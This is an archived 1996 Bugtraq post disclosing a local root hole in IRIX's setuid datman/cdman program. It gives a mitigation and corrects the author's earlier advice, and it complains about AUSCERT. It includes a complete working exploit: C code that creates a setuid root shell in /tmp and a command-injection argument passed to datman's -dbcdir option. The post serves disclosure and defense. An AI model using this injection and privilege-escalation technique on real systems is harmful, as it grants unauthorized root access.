Bugtraq mailing list archives
Irix: datman hole, errata
From: volobuev () t1 chem umn edu (Yuri Volobuev)
Date: Mon, 9 Dec 1996 16:07:38 -0600
Howdy, ABSTRACT /usr/sbin/datman, which is also invoked by running cdman, or double-clicking on cdrom icon on the desktop, is suid and buggy. It can be used by any local user to obtain root privileges (contrary to previously published information). Both Irix 5.3 and 6.2 are vulnerable, if dmedia_tools.sw.cddat subsystem is installed. FIX chmod -s /usr/sbin/datman This will break it. Another approach is to create a special group, 'console' or something like it, which only includes trusted people who have physical access to the system and thus may need functionality of cdman/datman, and only allow datman execution access to this group of trusted people, but not to everybody. This will reduce the risk, but as long as program is root owned and suid, vulnerability is there. ERRATA As some of you may remember, few weeks ago I posted cdplayer exploit on bugtraq. Among other things, it was saying
(it will break it, but it's no big deal, there's a program called cdman, usually invoked by double-clicking CD ROM icon on the desktop, that does the same thing, only better, and it's not suid).
As some friendly fellow pointed out (sorry, I don't have his name, I lost that message), this is an untrue. /usr/sbin/cdman is just a symlink to /usr/sbin/datman, which is indeed suid. And, of course, one can get root out of it, apparently with much less hassle than cdplayer, it was obvious from the very first look at the datman file size (803Kb), from that moment on it was just a matter of time. I apologize for giving people false feeling of safety (not that people should believe what I'm saying; but when what I'm saying is repeated by more trustworthy organizations like AUSCERT, it's more dangerous). If you are a busy person, move on to your next message now. FULL STORY I promised I'll stop cracking those defenseless suid programs (temporarily), but few things made me step back on hacking path. Most significantly, today morning I came across AUSCERT advisory AA-96.11, which describes the cdplayer problem. I didn't know it was out. It essentially repeats my original post, but of course doesn't mention my name. It'd be all right, but what pisses me off is that they didn't even verify what I was saying. What kind of service is that? They charge people serious money for their services, and after that most of their advisories just paraphrase original exploits posted by other people, without giving them any credit, and they apparently don't even double-check the information in the posts. There are not so many easy (and legal) ways to make money as good as that. Do nothing, repost other's work, collect cash. Hey, AUSCERT, what makes you suggest people cdman as a safer way to play cdroms? Did you check if it is safe? Did you spare half an hour to look through the executable to see that it's as broken as cdplayer? Too bad you didn't, half an hour would be sufficient. /usr/sbin/datman is essentially a fatter, more featured version of cdplayer (or cdplayer is stripped down datman, whatever). They do the same stuff in regard to cd-rom databases. However, datman calls setreuid(0, realuid) at the very beginning, so uid stays 0, but euid is whatever user's uid is. Interesting idea, it works in the sense that all created files are owned by user, but it doesn't help much otherwise. For backward compatibility reasons, upon startup datman looks for a file .cdplayerrc in the home directory. If it exists, and directory ~/.cddb doesn't exists, it will ask if you want to convert .cdplayerrc to .cddb. If you answer yes, it will invoke /usr/sbin/cddbcvt, giving old and new database names as arguments to it. Using system(). What more can be said? % cat > /tmp/makesh.c main() { seteuid(0); setegid(0); system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); } % cc /tmp/makesh.c -o /tmp/makesh % mv .cddb .cddb.old % touch .cdplayerrc % /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh" Created "/tmp/blah" Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah % ls -l /tmp/sh -r-sr-sr-x 1 root sys 140784 Dec 9 15:24 /tmp/sh* In above example, few dialog windows will pop up after starting datman. Just press enter in each of them. Make sure your DISPLAY is set correctly. Note though you can pass arbitrary shell commands to sh in -dbcdir, these commands will be executed with euid set to your uid, so seteuid(0) needs to be called first. A note to security folks everywhere. People. Why do you all ignore hackers? Why try to keep face and pretend hackers are not out there? Why don't you give them a credit for their work? Why don't you cooperate with them? One may say that hackers are bad people, and don't deserve any recognition. This is wrong. Predators in nature represent a vital part of environment. They serve many vital purposes, most importantly, they keep natural selection going. By killing weak they make animals get stronger and faster. This doesn't mean a zebra should like the lioness that killed it. But nevertheless, overall zebra community should be thankful to the fact that lions exist. Hackers are predators in computer world, often ruthless and extremely dangerous. But the very fact that they are out there makes entire branch of computer industry, computer security, exist. Hackers make developers design their programs better, and after all they are the reason why the modern computer world is as secure as it is (whatever this means). But even though developers have each and every right to hate hackers, why do security folks dislike them? These people are getting paid because of hackers, hackers are the very reason for their positions existence, and still only few smarter vendors have enough sense to at least admit the problem disclosed by a hacker. This is very sad. Not only it's disappointing, it ultimately may lead to some BAD things. This exploit is dedicated to AUSCERT. cheers, yuri Always speaking for myself and only for myself
Current thread:
- Irix: datman hole, errata Yuri Volobuev (Dec 09)